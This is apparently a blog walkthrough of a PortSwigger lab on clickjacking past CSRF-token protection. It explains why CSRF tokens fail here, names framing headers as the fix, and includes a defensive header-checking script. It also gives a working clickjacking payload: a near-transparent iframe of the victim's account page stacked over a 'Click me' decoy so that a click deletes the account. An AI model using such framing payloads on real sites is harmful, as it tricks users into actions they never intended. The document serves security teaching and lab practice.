
Basic clickjacking with CSRF token protection

What is Clickjacking?

Clickjacking is an interface-based attack in which a visitor is tricked into clicking on hidden or disguised elements of a legitimate website while they believe they are clicking on something else. The attacker loads the real site inside a frame on a decoy page and lines its buttons up under innocent-looking content, so the victim's own click performs an action on the real site without their knowledge. It works because the victim trusts what the decoy page appears to show.


Introduction To Basic clickjacking with CSRF token protection

Clickjacking is a web security vulnerability in which an attacker tricks a user into clicking a disguised or hidden element, so that the click performs an action the user never intended. It is important to understand that CSRF tokens do not mitigate it. A CSRF token ties a request to the session that rendered the form, and that is exactly what happens in a clickjacking attack: the victim's own browser renders the real, logged-in page inside the attacker's frame, token included, and then submits the real form. The token is present and valid, so the application accepts the request. The defences that actually work are framing controls: the X-Frame-Options header (DENY or SAMEORIGIN) and the Content-Security-Policy frame-ancestors directive, which tell the browser not to render the page inside a frame on another origin. Applications that set these headers, in addition to their CSRF protection, close off this attack while keeping their protection against classic cross-site request forgery.

Lab Solutions | Practical Work Time

This lab contains login functionality and a delete account button that is protected by a CSRF token. A user will click on elements that display the word “click” on a decoy website.

To solve the lab, craft some HTML that frames the account page and fools the user into deleting their account. The lab is solved when the account is deleted.

You can log in to your own account using the following credentials: wiener:peter

Stepwise solution of the lab:

After opening the lab, the first thing we notice is the My account link.

Click on My account and let's see what we have to do next.

Well, it's a login form, right?

Fill in the credentials wiener:peter and click Log in.

Once logged in, we see a function named Delete account. That is the target for our clickjacking technique. Now simply click on Go to exploit server.

After clicking on Go to exploit server, scroll down a little and paste the payload below into the Body section.

<style>
    iframe {
        position:relative;
        width:$width_value;      /* large enough to show the whole account page */
        height: $height_value;
        opacity: $opacity;       /* 0.1 while aligning, 0.0001 when delivering */
        z-index: 2;              /* the real page sits on top and receives the click */
    }
    div {
        position:absolute;
        top:$top_value;          /* moves the decoy so it sits under Delete account */
        left:$side_value;
        z-index: 1;              /* the decoy sits underneath the transparent iframe */
    }
</style>
<!-- The decoy text must contain the word "click" for this lab. -->
<div>Click me</div>
<!-- Keep the https:// scheme; without it the browser treats src as a relative path. -->
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/my-account"></iframe>

A quick overview before we continue: you need some basic knowledge of the HTML iframe tag and CSS. Replace YOUR-LAB-ID.web-security-academy.net/my-account with your own lab URL, keeping the https:// scheme. Then set the width and height so the iframe shows the whole account page, and adjust top and left until the decoy div sits directly under the Delete account button. These values depend on your screen size, so tune them while the iframe is still faintly visible. Now, why does this work? The iframe holding the real, logged-in account page is stacked on top (z-index 2) and made almost transparent, while the decoy div is underneath (z-index 1). The victim sees only the decoy text, but the click lands on the iframe, so their own browser submits the real Delete account form, CSRF token and all. The token offers no protection here because the request is a genuine one made from the victim's session; the victim simply never understands what they clicked.

Click on Store and view exploit.

With the decoy text positioned exactly over Delete account, the victim has no way of telling what is really being clicked. For this lab the decoy must contain the word "click", as in the "Click me" div above. To make the frame harder to spot, lower the opacity from 0.1 to 0.0001 before delivering: at 0.1 the framed page is still faintly visible, which is useful while aligning but would give the game away to the victim.

Now back to the exploit server and click on Deliver exploit to victim.

BOOM! We’ve solved this lab successfully.
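The introduction above names X-Frame-Options and CSP frame-ancestors as the real defences, and the walkthrough shows why the CSRF token did nothing. The following is an added example, not code from the original post and not PortSwigger's: a small check that answers "can the exploit server frame this response?" the way a browser does when it loads the iframe. The sample responses, the lab URL (YOUR-LAB-ID placeholder) and the exploit-server URL are all constructed for the example.

```javascript
// Added example (not from the original post or from PortSwigger): decide whether an
// attacker-controlled origin may frame a response, given its headers. All response
// text below is constructed; the lab id and exploit-server URL are placeholders.

function parseHeaders(raw) {
  // Turn raw response-header text into {lowercased-name: [value, ...]}.
  const out = {};
  for (const line of raw.split(/\r?\n/)) {
    const i = line.indexOf(':');
    if (i < 0) continue;                        // status line or blank line
    const name = line.slice(0, i).trim().toLowerCase();
    const value = line.slice(i + 1).trim();
    (out[name] = out[name] || []).push(value);
  }
  return out;
}

function frameAncestorsLists(headers) {
  // One source list per CSP header that carries frame-ancestors; every policy must allow.
  const lists = [];
  for (const policy of headers['content-security-policy'] || []) {
    for (const directive of policy.split(';')) {
      const tokens = directive.trim().split(/\s+/);
      if (tokens[0].toLowerCase() === 'frame-ancestors') lists.push(tokens.slice(1));
    }
  }
  return lists;
}

function hostSourceMatches(source, framer) {
  // Host sources such as trusted.example, https://trusted.example, https://*.trusted.example.
  // Simplification: ports and paths are ignored.
  const m = source.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^\/:]+)/);
  if (!m) return false;
  const [, scheme, host] = m;
  if (scheme && scheme + ':' !== framer.protocol) return false;
  if (host.startsWith('*.')) {
    const suffix = host.slice(1);               // "*.trusted.example" -> ".trusted.example"
    return framer.hostname.endsWith(suffix) && framer.hostname.length > suffix.length;
  }
  return framer.hostname === host;
}

function sourceMatches(source, framer, page) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return framer.origin === page.origin;
  if (s === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return framer.protocol === s;   // scheme source, e.g. https:
  return hostSourceMatches(s, framer);
}

function isFrameable(rawHeaders, pageUrl, framerUrl) {
  const headers = parseHeaders(rawHeaders);
  const page = new URL(pageUrl);
  const framer = new URL(framerUrl);

  // When a CSP frame-ancestors directive is present it decides, and X-Frame-Options
  // is ignored; that is what browsers supporting frame-ancestors do.
  const lists = frameAncestorsLists(headers);
  if (lists.length > 0) {
    return lists.every(list => list.some(src => sourceMatches(src, framer, page)));
  }

  // Otherwise X-Frame-Options. ALLOW-FROM is obsolete and unknown values are
  // ignored by current browsers, so both fall through to "frameable".
  const xfo = (headers['x-frame-options'] || [])[0];
  if (xfo) {
    const v = xfo.trim().toUpperCase();
    if (v === 'DENY') return false;
    if (v === 'SAMEORIGIN') return framer.origin === page.origin;
  }
  return true;
}

// Constructed sample responses. The first mirrors the lab: a CSRF token in the
// delete-account form but no framing control at all. The second is what the
// application should have sent.
const LAB_RESPONSE = [
  'HTTP/1.1 200 OK',
  'Content-Type: text/html; charset=utf-8',
].join('\r\n');

const HARDENED_RESPONSE = [
  'HTTP/1.1 200 OK',
  'Content-Type: text/html; charset=utf-8',
  "Content-Security-Policy: frame-ancestors 'none'",
  'X-Frame-Options: DENY',                     // fallback for browsers without CSP frame-ancestors
].join('\r\n');

const PAGE = 'https://YOUR-LAB-ID.web-security-academy.net/my-account';
const ATTACKER = 'https://exploit-server.example/exploit';   // placeholder exploit server

console.log('lab page frameable by the exploit server:', isFrameable(LAB_RESPONSE, PAGE, ATTACKER));           // true
console.log('hardened page frameable by the exploit server:', isFrameable(HARDENED_RESPONSE, PAGE, ATTACKER)); // false
```

Run it with node. The check only looks at the immediate framer; real browsers evaluate the whole ancestor chain, and the CSP host matching here ignores ports, so treat it as a triage aid rather than a browser emulator. Note how the lab's CSRF token does not appear in the decision at all: the only thing that matters is whether the response forbids framing.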

Be ready for the other parts of this series.

That completes Basic clickjacking with CSRF token protection. If you have finished the previous topic, WebSockets, the next lab in the Clickjacking topic is Clickjacking with form input data prefilled from a URL parameter. Please follow us for more details, and good luck!

Thank you for reading, if this article really helps you then do share it with your mates.
And follow @masaudsec on Twitter.

This Post Has 2 Comments

  1. Ronald Tanhamira

    Thanks for the information. That's my dream, to be in cyber security.

    1. Nova Experience

      Thank You, Ronald Tanhamira, may your dreams come true.
      Good Luck
      Best Regards
      Team Nova Experience.
